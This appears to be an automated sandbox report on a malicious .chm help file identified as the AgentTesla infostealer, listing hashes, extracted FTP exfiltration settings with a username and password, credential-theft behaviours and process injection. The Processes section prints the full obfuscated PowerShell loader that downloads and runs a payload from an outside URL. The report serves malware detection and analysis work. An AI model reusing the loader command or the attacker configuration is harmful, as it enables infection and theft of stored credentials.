Analysis
-
max time kernel
51s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
20-05-2022 01:54
Static task
static1
Behavioral task
behavioral1
Sample
4e5ef8e38b17fdf30961f28d4b5e2e23.chm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
4e5ef8e38b17fdf30961f28d4b5e2e23.chm
Resource
win10v2004-20220414-en
General
-
Target
4e5ef8e38b17fdf30961f28d4b5e2e23.chm
-
Size
14KB
-
MD5
4e5ef8e38b17fdf30961f28d4b5e2e23
-
SHA1
a7da3f869505242eb93c6bb07bc7cc76b6a5d71b
-
SHA256
f0c20d4ea2e2cc1d3c9df58b1a4854f9e3b761b7cd0c26860559289c74a8d50f
-
SHA512
c33cfc30c355dcb2638a7835986572c3da27b12cbb6c4a3773fbd1ce03e2c5b1710e15f1a15253f2951455eae53e71b5837dcc4176ace40bf43326b72e846f7c
Malware Config
Extracted
http://pacurariu.com/F37.jpg
Extracted
Protocol: ftp- Host:
ftp.jordi-spedition.com - Port:
21 - Username:
[email protected] - Password:
asdqwe123!@#
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.jordi-spedition.com/ - Port:
21 - Username:
[email protected] - Password:
asdqwe123!@#
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
suricata: ET MALWARE AgentTesla Exfil via FTP
suricata: ET MALWARE AgentTesla Exfil via FTP
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2024 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 2024 powershell.exe 2024 powershell.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2024 set thread context of 1200 2024 powershell.exe 32 -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main hh.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2024 powershell.exe 1200 RegAsm.exe 1200 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 2024 powershell.exe Token: SeIncreaseQuotaPrivilege 2024 powershell.exe Token: SeSecurityPrivilege 2024 powershell.exe Token: SeTakeOwnershipPrivilege 2024 powershell.exe Token: SeLoadDriverPrivilege 2024 powershell.exe Token: SeSystemProfilePrivilege 2024 powershell.exe Token: SeSystemtimePrivilege 2024 powershell.exe Token: SeProfSingleProcessPrivilege 2024 powershell.exe Token: SeIncBasePriorityPrivilege 2024 powershell.exe Token: SeCreatePagefilePrivilege 2024 powershell.exe Token: SeBackupPrivilege 2024 powershell.exe Token: SeRestorePrivilege 2024 powershell.exe Token: SeShutdownPrivilege 2024 powershell.exe Token: SeDebugPrivilege 2024 powershell.exe Token: SeSystemEnvironmentPrivilege 2024 powershell.exe Token: SeRemoteShutdownPrivilege 2024 powershell.exe Token: SeUndockPrivilege 2024 powershell.exe Token: SeManageVolumePrivilege 2024 powershell.exe Token: 33 2024 powershell.exe Token: 34 2024 powershell.exe Token: 35 2024 powershell.exe Token: SeDebugPrivilege 1200 RegAsm.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1160 hh.exe 1160 hh.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1160 wrote to memory of 2024 1160 hh.exe 29 PID 1160 wrote to memory of 2024 1160 hh.exe 29 PID 1160 wrote to memory of 2024 1160 hh.exe 29 PID 2024 wrote to memory of 1200 2024 powershell.exe 32 PID 2024 wrote to memory of 1200 2024 powershell.exe 32 PID 2024 wrote to memory of 1200 2024 powershell.exe 32 PID 2024 wrote to memory of 1200 2024 powershell.exe 32 PID 2024 wrote to memory of 1200 2024 powershell.exe 32 PID 2024 wrote to memory of 1200 2024 powershell.exe 32 PID 2024 wrote to memory of 1200 2024 powershell.exe 32 PID 2024 wrote to memory of 1200 2024 powershell.exe 32 PID 2024 wrote to memory of 1200 2024 powershell.exe 32 PID 2024 wrote to memory of 1200 2024 powershell.exe 32 PID 2024 wrote to memory of 1200 2024 powershell.exe 32 PID 2024 wrote to memory of 1200 2024 powershell.exe 32 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\4e5ef8e38b17fdf30961f28d4b5e2e23.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'http' + '://pacurariu.com/F37.jpg')|P2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1200
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81